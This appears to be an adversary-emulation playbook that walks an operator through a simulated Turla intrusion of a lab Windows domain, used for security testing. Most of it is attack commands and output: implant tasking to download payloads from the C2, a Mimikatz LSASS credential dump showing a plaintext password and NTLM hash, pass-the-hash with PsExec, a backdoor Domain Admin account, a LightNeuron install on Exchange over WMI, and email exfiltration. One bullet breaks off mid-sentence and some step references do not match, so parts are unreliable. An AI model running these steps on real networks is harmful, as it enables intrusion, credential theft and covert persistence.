# Scenario Overview
Legend of symbols:
- 💡 - callout notes
- ❗ - extremely important note
- ➡️ - Switching to another session
- ⭕ - Sign out of something
# Setup
➡️ RDP, do not SSH, to the Kali attacker machine (176.59.15.33).
- Open a new terminal window, cd to the control server directory of the cloned repo, and start the control server:
```
cd /opt/day2/turla/Resources/control_server
rm logs.txt
sudo ./controlServer -c ./config/turla_day2.yml
```
- Ensure the EPIC, Snake, and LightNeuron handlers started up.
# Step 11 - Initial Compromise and Establish Foothold
🎤 Voice Track:
Step 11 emulates Turla gaining initial access via a watering hole attack targeting user `Egle`.
`Egle` visits a legitimate, but compromised, website. This website redirects `Egle` to a duplicated, malicious version of the compromised website hosted on an adversary server. The duplicate contains JavaScript (JS) that fingerprints their machine in the background and installs an evercookie in their browser. This malicious WordPress website prompts `Egle` with a notice to update their NotFlash. `Egle` clicks to download the update, `NFVersion_5e.exe`, containing EPIC (a.k.a. Tavdig/Wipbot).
The execution flow of EPIC follows the same execution flow as EPIC in the Carbon scenario. The only difference in this scenario's version of EPIC is that it communicates over HTTPS instead.
Once C2 communications have been established between EPIC and the C2 via the proxy server, discovery is performed on the first host, where information about the host device and domain computers is collected.
## ☣️ Procedures
➡️ RDP to `Azuolas (10.100.40.103)` as `Egle`:
- Open Microsoft Edge and browse to `nato-int.com`.
- Wait for redirection to `anto-int.com`.
- After redirection you will be prompted to update NotFlash. Click to download the update (`NFVersion_5e.exe`) bundled with EPIC (a.k.a. Tavdig/Wipbot).
- Once the download has completed, click the downloaded binary to execute it.
- Wait 1 minute for it to finish running.
- Close out of all tabs and sign out of your RDP session.
Re-RDP to `Azuolas (10.100.40.103)` as `Egle`:
- Open Microsoft Edge and browse to `https://drebule.nk.local/owa`. Log in as `Egle`:
➡️ Set a timer for 2 minutes, then switch to your Kali control server terminal and confirm that a new implant has registered and the automated discovery output has been returned in the server log.
NOTE: The injector will wait 2 minutes before injecting EPIC's Guard DLL into explorer.exe and, subsequently, EPIC's worker DLL into Microsoft Edge.
Within the terminal window, split your terminal horizontally via right-click -> split terminal. Be careful not to accidentally terminate the control server.
In your lower terminal tab, task the EPIC implant with the following set of discovery commands:
```
cd /opt/day2/turla/Resources/control_server
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | systeminfo && net group "Domain Computers" /domain'
```
## 🗿 Source Code
- Watering Hole
  - Browser redirection
  - Browser evercookie (utilizes the built-in BeEF Evercookie from the Browser Exploitation Framework)
  - Fingerprinting details
- EPIC Dropper
- EPIC Injector
  - Extract EPIC Guard DLL from resources section: `FindResourceW`
  - Targeting explorer.exe for DLL injection
- EPIC Guard
  - Extract EPIC payload DLL from resources section: `FindResourceW`
  - Targeting svchost.exe for payload DLL injection
- EPIC Payload (in msedge.exe)
  - Execute commands: `ExecCmd`
  - User discovery: `GetAllUsers`
  - Directory discovery: `DirectoryDiscovery`
  - Write results to log file: `WriteResults`
  - C2 communications are over HTTPS: HTTPS-specific flags
## 🔬 Cited Intelligence
- https://securelist.com/analysis/publications/65545/the-epic-turla-operation/
- https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080105/KL_Epic_Turla_Technical_Appendix_20140806.pdf
- https://recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Visiting-The-Snake-Nest.pdf
- https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf
- https://docs.broadcom.com/doc/waterbug-attack-group
- https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/
- https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/
- https://github.com/samyk/evercookie
# Step 12 - Rootkit Installation
🎤 Voice Track:
Step 12 emulates Turla exploiting a vulnerable driver to install the Snake rootkit on the `Azuolas (10.100.40.103)` system.
The existing EPIC implant, running under the context of `Egle`, will be used to download the Snake installer to the local machine and execute the installer as second-stage malware. The Snake installer will escalate privileges to SYSTEM by exploiting a Windows 10 vulnerability. Once running as SYSTEM, the installer will disable DSE (Driver Signature Enforcement) by loading and exploiting a vulnerable driver. Once DSE is disabled, the installer will load the Snake rootkit driver.
The rootkit driver will hook various functions and will inject a user-mode DLL into a SYSTEM process to execute tasks received from the C2 server. The driver will then wait for a browser process to make a network request and inject the user-mode DLL into the browser for C2 communications over HTTP. The injected DLLs will communicate with each other via named pipes.
At some point, `Egle` will browse to a website, triggering the rootkit driver to inject the user-mode DLL into the browser process; this DLL will begin communication with the C2 server over HTTP.
## ☣️ Procedures
In your Kali C2 server, ensure that you are in the lower split terminal window.
- Task the EPIC implant to download the Snake rootkit installer:
```
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'name | C:\\Users\\Egle\\Desktop\\gusbsys.exe | snake.exe'
```
- Wait 1 minute after the payload is successfully downloaded before tasking the implant to execute the Snake rootkit installer with the privilege escalation option:
```
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | C:\\Users\\Egle\\Desktop\\gusbsys.exe -f'
```
- ➡️ Switch to your RDP session on `azuolas (10.100.40.103)` and go to your Edge window. Perform a hard refresh on the current page by pressing Ctrl+Shift+R.
➡️ Return to your Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.
## 🗿 Source Code
- EPIC
  - File download: `DownloadFile`
  - Execute commands: `ExecCmd`
- Snake Installer
- Snake Rootkit
- Snake Usermodule DLL
## 🔬 Cited Intelligence
- Report 9: Securelist/Artemon - Uroburos
- Report 10: BAE/Artemon - Snake
- Report 11: GData - Uroburos
- Report 12: CIRCL - TR-25
- Report 13: GData - Kernel Protection Mitigation
- Report 14: GData - using WinDbg
- Report 16: GData - Project Cobra
- Report 17: Tetrane - Uroburos with REVEN
- Report 18: Talos - Snake Campaign
- Report 19: Lastline - Dissecting Turla Rootkit
- Report 20: Lastline - Kernel Exploit Makeover
- Report 27: GitHub - hfiref0x/TDL
- Report 28: CoreLabs - VirtualBox Privilege Escalation
- Report 29: Unit42 - Acidbox
# Step 13 - First Workstation Discovery
🎤 Voice Track:
Step 13 emulates Turla performing discovery on the first workstation to discover a file server and the associated file server admin.
The Snake rootkit receives tasking from the C2 server to enumerate currently running processes on the local computer and finds that `EgleAdmin` also has processes running. Further enumeration of the `EgleAdmin` user shows that it is a member of the `File Server Admins` group. Snake then impersonates `Egle` to enumerate mapped drives on the local machine and discovers `Egle`'s home drive is actively mapped to the file server.
## ☣️ Procedures
➡️ Return to your RDP session to `azuolas (10.100.40.103)` as `Egle`.
- Open up a PowerShell terminal and run the following command:
```
runas /user:nk\egleadmin powershell
```
- When prompted, type in the password for `EgleAdmin`:
- A new PowerShell window should pop up. Run the following command to ensure that you are running as `nk\EgleAdmin`:
```
whoami
```
➡️ Return to your Kali C2 server.
- From your lower Kali C2 terminal window, task the Snake rootkit to run the following process discovery command:
```
# Discover running processes
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
```
- ❗ Verify that the enumerated process output contains a process running under `EgleAdmin`:
```
grep 'NK\\EgleAdmin' logs.txt -i
```
- This should return output similar to the following:
```
powershell.exe   2868 RDP-Tcp#6   5   79,140 K Unknown   NK\egleadmin   0:00:00 N/A
conhost.exe      7368 RDP-Tcp#6   5   18,088 K Unknown   NK\egleadmin   0:00:00 N/A
```
- Wait 1 minute, then execute the next discovery command to enumerate `EgleAdmin`'s groups:
```
# Enumerate details on EgleAdmin to find group membership
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "user /domain EgleAdmin"}'
```
❗ Verify that `File Server Admins` is listed as one of the groups that `EgleAdmin` is a member of.
- Wait 1 minute, then execute the next discovery command to find the drive mapped to the file server:
```
# Discover that the local machine has a drive mapped to the file server
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "use", "runas": "nk\\Egle"}'
```
❗ Verify that the home drive is mapped to the file server host `berzas (10.100.30.204)`.
## 🗿 Source Code
## 🔬 Cited Intelligence
# Step 14 - Lateral Movement to File Server
🎤 Voice Track:
Step 14 emulates Turla using the discovered admin account to laterally move to the file server and install the Snake rootkit on it.
Using the information discovered in the previous step, Snake impersonates the EgleAdmin account to run PsExec and execute another copy of the Snake rootkit installer on the file server. This new copy of the Snake installer will have the installed rootkit beacon back to the C2 server via a different redirector.
## ☣️ Procedures
- Task the implant to download PsExec:
```
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 4, "file": "PsExec.exe", "dest":"C:\\Windows\\System32\\file_svc_mgr.exe"}'
```
- Wait 1 minute and then run the following command to download the Snake installer:
```
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 4, "file": "installer_v2.exe", "dest":"C:\\Windows\\System32\\cmu_svc_v2.exe"}'
```
- Wait 1 minute before running the following command to execute PsExec as `EgleAdmin`, which will run the Snake installer on the file server `berzas (10.100.30.204)`:
```
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "C:\\Windows\\System32\\file_svc_mgr.exe", "args":"\\\\berzas -accepteula -s -c C:\\Windows\\System32\\cmu_svc_v2.exe", "runas":"nk\\EgleAdmin"}'
```
➡️ Go back to your RDP session to `Azuolas (10.100.40.103)` as `Egle`.
- Minimize the RDP window.
➡️ RDP into `berzas (10.100.30.204)` as `EgleAdmin`:
- Close any spurious windows.
- Open Edge and navigate to https://www.google.com. Perform a search on `File server configuration best practices`, but don't click on any results.
- Minimize the RDP window, keeping processes running.
➡️ Check the Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.
- Wait 1 minute before running the following command to remove files from `Azuolas (10.100.40.103)`:
```
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\file_svc_mgr.exe C:\\Windows\\System32\\cmu_svc_v2.exe"}'
```
## 🗿 Source Code
## 🔬 Cited Intelligence
# Step 15 - Domain Discovery
🎤 Voice Track:
Step 15 emulates Turla using PowerShell to perform Active Directory user, group, and computer discovery.
The Snake rootkit receives tasking from the C2 server to use PowerShell's `ActiveDirectory` module to enumerate domain users, admin groups, and computers. Upon discovering `Zilvinas`'s regular and domain admin accounts, Snake will enumerate further details on the accounts. Snake then discovers a workstation belonging to `Zilvinas` to use as a future lateral movement target.
## ☣️ Procedures
- From your lower Kali C2 control server terminal window, task Snake to check if the `ActiveDirectory` PowerShell module is installed:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Get-Module -ListAvailable -Name ActiveDirectory"}'
```
❗ Verify that you see output. If the implant returns empty output, please contact your lead.
- Wait 1 minute before tasking Snake to collect a list of Active Directory groups containing the word "management", as members of these groups will likely have elevated permissions on the network:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroup -Filter * | Where-Object Name -Match \"management\" | Select Name"}'
```
❗ Verify that `Server Management` is included in the results.
- Wait 1 minute before tasking Snake to obtain the usernames of accounts within the `Server Management` domain group. This tells Turla which users to target next:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Server Management\" | Select Name,SamAccountName"}'
```
❗ Verify that `ZilvinasAdmin` shows up in the list of accounts.
- Wait 1 minute before tasking Snake to obtain the usernames of accounts within the `Domain Admins` domain group:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Domain Admins\" | Select Name,SamAccountName"}'
```
❗ Verify that `ZilvinasAdmin` shows up in the list of accounts.
- Wait 1 minute before tasking Snake to discover domain users. Ensure `Zilvinas` and `ZilvinasAdmin` appear in the output:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADUser -Filter {LastLogonDate -ne 0} -Properties * | Select Name,SamAccountName"}'
```
- Finally, wait 1 minute before tasking Snake to obtain a list of domain computers and some of their information (IP addresses, DNS names, and description):
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | Select Name,DnsName,IPv4Address,Description"}'
```
❗ Ensure that `Zilvinas' Workstation` appears in the `Description` field for `uosis`.
## 🗿 Source Code
## 🔬 Cited Intelligence
- TBD
# Step 16 - Preparation for Lateral Movement to Admin Workstation
🎤 Voice Track:
Step 16 emulates Turla performing credential dumping on the file server with the goal of moving laterally to a workstation owned by a Domain Admin.
Snake downloads Mimikatz to the file server and extracts all NTLM hashes on the target. The command output is sent directly to the C2 server.
## ☣️ Procedures
- From the Kali C2 server lower terminal window, task Snake to download Mimikatz to the file server:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "mimikatz.exe", "dest": "C:\\Windows\\System32\\loadperf.exe"}'
```
- Wait 1 minute and then instruct Snake to download PsExec to the file server:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "PsExec.exe", "dest": "C:\\Windows\\System32\\fs_mgr.exe"}'
```
- Wait 1 minute and then run the following command to download the Snake installer:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "installer_v3.exe", "dest":"C:\\Windows\\System32\\cmu_svc.exe"}'
```
- Wait 1 minute and then instruct Snake to run Mimikatz to dump all NTLM hashes from `LSASS.exe`:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"pr::d\" \"slsa::lop\" \"quit\""}'
```
- ❗ Verify that the password `Producer2!` and NTLM hash `f3fcd61f987a97da49ce5f650b4e6539` for `ZilvinasAdmin` appear at least once in the output:
```
grep '* Username : ZilvinasAdmin' logs.txt -C 5 -i
```
- This should return:
```
* Username : ZilvinasAdmin
* Domain : NK
* NTLM : f3fcd61f987a97da49ce5f650b4e6539
* SHA1 : fc8c801521140666c793108b67716caf4c4189f4
* DPAPI : b06d7bea8849897b811e1d73ab22726c
tsPkG :
* Username : ZilvinasAdmin
* Domain : NK
* Password : Producer2!
kErberoS :
* Username : ZilvinasAdmin
* Domain : NK.LOCAL
* Password : (null)
sSp :
crEdMan :
```
## 🗿 Source Code
## 🔬 Cited Intelligence
- TBD
# Step 17 - Lateral Movement to Admin Workstation and Persistence
🎤 Voice Track:
Step 17 emulates Turla performing lateral movement to the domain admin's workstation and establishing additional persistence by creating a new domain admin account.
The NTLM hash retrieved in the previous step is used in a pass-the-hash attack to move laterally to `Zilvinas`'s workstation. PsExec is used via pass-the-hash to execute and install the Snake rootkit on the target workstation.
Once the admin workstation has been compromised, Snake is used to enumerate processes running on `Zilvinas`'s workstation `uosis`, where it is discovered that `ZilvinasAdmin` has processes running which can be used for token impersonation. By impersonating `ZilvinasAdmin`, a new domain user `Leshy` is created and added to the `Domain Admins` domain group for persistence.
## ☣️ Procedures
- Instruct Snake to pass-the-hash using `ZilvinasAdmin`'s NTLM hash to run PsExec and install Snake on the target workstation:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"privilege::debug\" \"sekurlsa::pth /user:ZilvinasAdmin /ntlm:f3fcd61f987a97da49ce5f650b4e6539 /domain:nk.local /remotepc:uosis /pexe:C:\\Windows\\System32\\fs_mgr.exe /sys:1 /prun:C:\\Windows\\System32\\cmu_svc.exe\" \"quit\""}'
```
➡️ Wait 2 minutes. Start a new RDP session to `uosis (10.100.40.102)` as `Zilvinas`:
- Open Edge and navigate to `https://drebule.nk.local/owa`. Log in as `Zilvinas`:
- Spend a couple of minutes reading through any unread emails to wait for the implant to start beaconing back to the C2 server.
➡️ Return to the Kali C2 terminal window and verify that a new implant session is beaconing back to the C2 server.
- Wait 1 minute and then task the implant to delete artifacts from the file server:
```
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 1, "command": "del /Q C:\\Windows\\System32\\fs_mgr.exe C:\\Windows\\System32\\loadperf.exe C:\\Windows\\System32\\cmu_svc.exe"}'
```
➡️ Return to your RDP session to `uosis (10.100.40.102)` as `Zilvinas`.
- Click on the search bar and search for `powershell`. Right-click `powershell` and then click "Run as Administrator". When prompted, type in the username and password for `ZilvinasAdmin`:
- A new PowerShell window should pop up. Run the following command to ensure that you are running as `nk\ZilvinasAdmin`:
```
whoami
```
➡️ Return to the Kali C2 server.
- From the lower terminal window, task Snake to enumerate running processes on the machine to discover processes under `ZilvinasAdmin`:
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
```
- ❗ Verify that we find processes running under `ZilvinasAdmin`:
```
grep 'NK\\ZilvinasAdmin' logs.txt -i
```
- This should return output similar to the following:
```
powershell.exe   8152 RDP-Tcp#2   3   83,280 K Unknown   NK\ZilvinasAdmin   0:00:00 N/A
conhost.exe       312 RDP-Tcp#2   3   17,356 K Unknown   NK\ZilvinasAdmin   0:00:00 N/A
```
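The `grep` checks in Step 13 and in this step answer the same question: which account owns which rows of the `tasklist /v` output. The following Python is an added example and is not part of the emulation plan or its tooling. It parses `tasklist /v` rows into fields and reports which of a given set of privileged accounts have interactive sessions on the host. A defender reviewing the same data would ask the question the other way round, to find admin accounts logged on to ordinary user workstations, which is exactly the exposure these two steps depend on. The sample output is constructed from the rows quoted above plus two extra rows, and the function names are assumptions introduced here.

```python
import re

# tasklist /v prints one row per process with the columns Image Name, PID,
# Session Name, Session#, Mem Usage, Status, User Name, CPU Time, Window Title.
# Matching on whitespace boundaries keeps the parser tolerant of the column
# collapsing that happens when the output is pasted into a log file.
_ROW = re.compile(
    r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<session>\S+)\s+(?P<session_no>\d+)\s+"
    r"(?P<mem_kb>[\d,]+) K\s+(?P<status>Unknown|Running|Not Responding)\s+"
    r"(?P<user>.+?)\s+(?P<cpu>\d+:\d{2}:\d{2})\s+(?P<title>.*)$"
)

# Constructed sample: the two rows quoted in the procedure above plus a SYSTEM
# service and the user's own browser, so both the admin session and the noise
# around it are represented.
SAMPLE_TASKLIST = """\
Image Name                     PID Session Name        Session#    Mem Usage Status          User Name            CPU Time Window Title
========================= ======== ================ =========== ============ =============== ==================== ============ ====================
svchost.exe                    912 Services                   0     12,004 K Unknown         NT AUTHORITY\\SYSTEM   0:00:01 N/A
msedge.exe                    4412 RDP-Tcp#2                  3    210,532 K Running         NK\\Zilvinas           0:00:12 Outlook - Microsoft Edge
powershell.exe                8152 RDP-Tcp#2                  3     83,280 K Unknown         NK\\ZilvinasAdmin      0:00:00 N/A
conhost.exe                    312 RDP-Tcp#2                  3     17,356 K Unknown         NK\\ZilvinasAdmin      0:00:00 N/A
"""


def parse_tasklist(text):
    """Return one dict per process row, skipping the header and separator lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Image Name") or line.startswith("="):
            continue
        m = _ROW.match(line)
        if m is None:
            continue  # unrecognised row, e.g. a line truncated in the log
        rec = m.groupdict()
        rec["pid"] = int(rec["pid"])
        rec["session_no"] = int(rec["session_no"])
        rec["mem_kb"] = int(rec["mem_kb"].replace(",", ""))
        records.append(rec)
    return records


def _same_account(user, account):
    """Case-insensitive match; 'DOMAIN\\user' must match fully, a bare name matches any domain."""
    user, account = user.lower(), account.lower()
    if "\\" in account:
        return user == account
    return user.split("\\")[-1] == account


def processes_for_user(text, account):
    """The rows whose User Name column belongs to account (the grep above, structured)."""
    return [r for r in parse_tasklist(text) if _same_account(r["user"], account)]


def privileged_sessions(text, privileged_accounts):
    """Sorted (user, session name) pairs showing where privileged accounts are logged on.

    An admin account with an interactive session on a user workstation is the
    condition this step relies on, so the same query doubles as a hygiene check.
    """
    found = set()
    for r in parse_tasklist(text):
        if any(_same_account(r["user"], acct) for acct in privileged_accounts):
            found.add((r["user"], r["session"]))
    return sorted(found)


if __name__ == "__main__":
    for r in processes_for_user(SAMPLE_TASKLIST, "ZilvinasAdmin"):
        print(f'{r["image"]:<16} pid={r["pid"]:<6} session={r["session"]} user={r["user"]}')
    print(privileged_sessions(SAMPLE_TASKLIST, {"EgleAdmin", "ZilvinasAdmin"}))
```

Run against a saved copy of the implant's `tasklist /v` output, the `privileged_sessions` call lists each admin account and the session it is attached to, which is more useful for a triage note than the raw `grep` hits because it separates the account's own processes from the session they were spawned in.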
- Wait 1 minute, then instruct Snake to create a new domain user `Leshy` using an access token from one of the `ZilvinasAdmin` processes. `Leshy` will be used as a backdoor domain admin account for persistence on the domain.
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net user leshy Password12345 /add /domain", "runas": "nk\\zilvinasadmin"}'
```
- Wait 1 minute, then instruct Snake to add `Leshy` to the `Domain Admins` group.
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net group \"Domain Admins\" leshy /add /domain", "runas": "nk\\zilvinasadmin"}'
```
## 🗿 Source Code
## 🔬 Cited Intelligence
- TBD
# Step 18 - Lateral Movement to Exchange Server
🎤 Voice Track:
Step 18 emulates Turla laterally moving to the Exchange server and installing the LightNeuron implant there.
Snake downloads LightNeuron and the associated PowerShell installation script and config files, transfers them to the Exchange server, and remotely executes the installation script using WMI to install LightNeuron on the Exchange server.
## ☣️ Procedures
- From the Kali C2 lower terminal window, task Snake to download LightNeuron:
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "ln_transport_agent.dll", "dest":"C:\\Windows\\System32\\mtxconf.dll"}'
```
- Wait 1 minute and then task Snake to download the companion DLL for LightNeuron:
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "n_installer_aux.dll", "dest":"C:\\Windows\\System32\\mtxcli.dll"}'
```
- Wait 1 minute and then task Snake to download the PowerShell installation script for LightNeuron:
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "msiex.ps1", "dest":"C:\\Windows\\System32\\msiex.ps1"}'
```
- Wait 1 minute and then task Snake to download the LightNeuron email rules file:
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "rules.xml", "dest":"C:\\Windows\\System32\\wdr.rules.xml"}'
```
- Wait 1 minute and then task Snake to download the LightNeuron config file:
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "winmail.dat", "dest":"C:\\Windows\\System32\\perfe009.dat"}'
```
- Wait 1 minute and then task Snake to copy LightNeuron, the rules config file, and the PowerShell installation script to the remote target `drebule`, using token impersonation to perform the copy as `ZilvinasAdmin`:
```
# Copy LightNeuron
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxconf.dll \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\agents\\Hygiene\\Microsoft.Exchange.Transport.Agent.ConnectionFiltering.dll\"", "runas": "nk\\zilvinasadmin"}'
```
- Wait 1 minute before copying the next file:
```
# Copy LightNeuron companion DLL
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxcli.dll \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\exdbdata.dll\"", "runas": "nk\\zilvinasadmin"}'
```
- Wait 1 minute before copying the next file:
```
# Copy installation script
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\msiex.ps1 \\\\drebule\\C$\\Windows\\System32\\msiex.ps1", "runas": "nk\\zilvinasadmin"}'
```
- Wait 1 minute before copying the rules file:
```
# Copy email rules file
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\wdr.rules.xml \\\\drebule\\C$\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\msmdat.xml", "runas": "nk\\zilvinasadmin"}'
```
- Wait 1 minute before copying the last config file:
```
# Copy config file
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\perfe009.dat \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\winmail.dat\"", "runas": "nk\\zilvinasadmin"}'
```
- Wait 1 minute and then task Snake to install LightNeuron remotely using WMI and PowerShell, using `ZilvinasAdmin`'s token:
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 3, "proc": "wmic.exe", "args": "/node:drebule /privileges:enable /output:STDOUT process call create \"cmd.exe /c powershell.exe -File C:\\Windows\\System32\\msiex.ps1 > C:\\Windows\\Temp\\msiexinstallation.log 2>&1\"", "runas": "nk\\ZilvinasAdmin"}'
```
❗ Verify that the WMIC output shows a `ReturnValue` of 0.
- Wait 1 minute and then task Snake to check the installation log for any errors:
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "type \\\\drebule\\C$\\Windows\\Temp\\msiexinstallation.log", "runas": "nk\\ZilvinasAdmin"}'
```
Expected output will start with messages regarding PS-Session; the bottom of the file should look like:
```
PSComputerName        : localhost
RunspaceId            : 1e56a6dd-5fd2-4545-9db8-2a4ca6a77212
Enabled               : False
Priority              : 10
TransportAgentFactory : Microsoft.Exchange.Transport.Agent.ConnectionFiltering.ConnectionFilteringAgentFactory
AssemblyPath          : C:\Program Files\Microsoft\Exchange Server\V15\TransportRoles\agents\Hygiene\Microsoft.Exchange.Transport.Agent.ConnectionFiltering.dll
IsCritical            : True
EscalationTeam        :
Identity              : Connection Filtering Agent
IsValid               : True
ObjectState           : New
WARNING: Please exit Windows PowerShell to complete the installation.
WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport
WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to stop...
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start...
```
❗ If the output contains any errors, notify your lead.
- Wait 1 minute and then task Snake to remove artifacts from `uosis (10.100.40.102)`:
```
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\msiex.ps1 C:\\Windows\\System32\\wdr.rules.xml C:\\Windows\\System32\\mtxconf.dll C:\\Windows\\System32\\mtxcli.dll C:\\Windows\\System32\\perfe009.dat"}'
```
## 🗿 Source Code
## 🔬 Cited Intelligence
- TBD
# Step 19 - Discovery and Email Collection
🎤 Voice Track:
Step 19 emulates Turla sending several discovery commands to the LightNeuron implant and collecting and exfiltrating email traffic.
Emails with JPG attachments containing AES-encrypted commands embedded using steganography are sent from the C2 server to the domain. LightNeuron's transport agent processes all emails via LightNeuron's companion DLL, which executes the embedded command and blocks delivery of the email from the C2 server.
LightNeuron automatically collects all emails with recipients matching `nk.local` in a log file (`C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\msmdat.xml`).
Eventually, LightNeuron is tasked to exfiltrate the email log, which is exfiltrated over the existing C2 channel.
## ☣️ Procedures
- From the Kali C2 lower terminal window, task LightNeuron to perform system network configuration discovery:
```
./evalsC2client.py --set-task info@nk.local '5 | ipconfig /all'
```
❗ If no response is received after 5 minutes, check the postfix logs on the Kali server to make sure the email was intercepted and processed correctly by LightNeuron:
```
grep postfix /var/log/syslog
```
- If there is a `reject` entry, that means the email, destined for a nonexistent user, was processed by the Exchange server, meaning that LightNeuron was either not successfully installed or is not working properly.
- If there is a
➡️ Return to your RDP session to `uosis (10.100.40.102)` as `Zilvinas`.
- Go to your Edge browser window with the OWA page. Your windows should still be up from Step 6.
- Create a new email:
  - The email recipient should be the user `egle@nk.local`
  - The email subject should be `SAP Integration Issue`
  - The following text should be pasted in as the email body:
```
Hi Egle, After our meeting earlier I spoke with Tenko about the SAP integration issue that was preventing the users from logging in. I did a little digging and noticed there is an authentication error on the SAP server. When you get a few minutes could you check to make sure the service account is still active and the credentials have not expired? The account name is SVC_SAP2.
```
  - Send the email
➡️ Switch to your RDP window to `Azuolas (10.100.40.103)` as `Egle`.
- Go to your Edge browser window. You should still be logged into OWA from Step 2.
- You should see the email from `Zilvinas@nk.local`. Try reloading the page if needed.
- Reply to the email from Zilvinas. The following text should be pasted in as the email reply body:
```
Zilvinas, I just checked on the service account. It appears that the account was still active, but the password had expired. I've adjusted the settings for the account, so the password should not expire again. The new password is: dfsbH%T5RWf3bwq3aeGR$3% Let me know if this fixes the authentication issue.
```
- Send the email
➡️ Return to the Kali C2 server lower terminal window. Task the LightNeuron implant to exfiltrate the email log file:
```
./evalsC2client.py --set-task info@nk.local '3 | 0'
```
- The file contents will be logged by the control server. ❗ Verify that the exfil was logged by the control server by checking the terminal window with the server output or by checking the server log file. The logs should contain the password Egle sent to Zilvinas:
```
grep 'dfsbH%T5RWf3bwq3aeGR$3%' /opt/day2/turla/Resources/control_server/logs.txt
```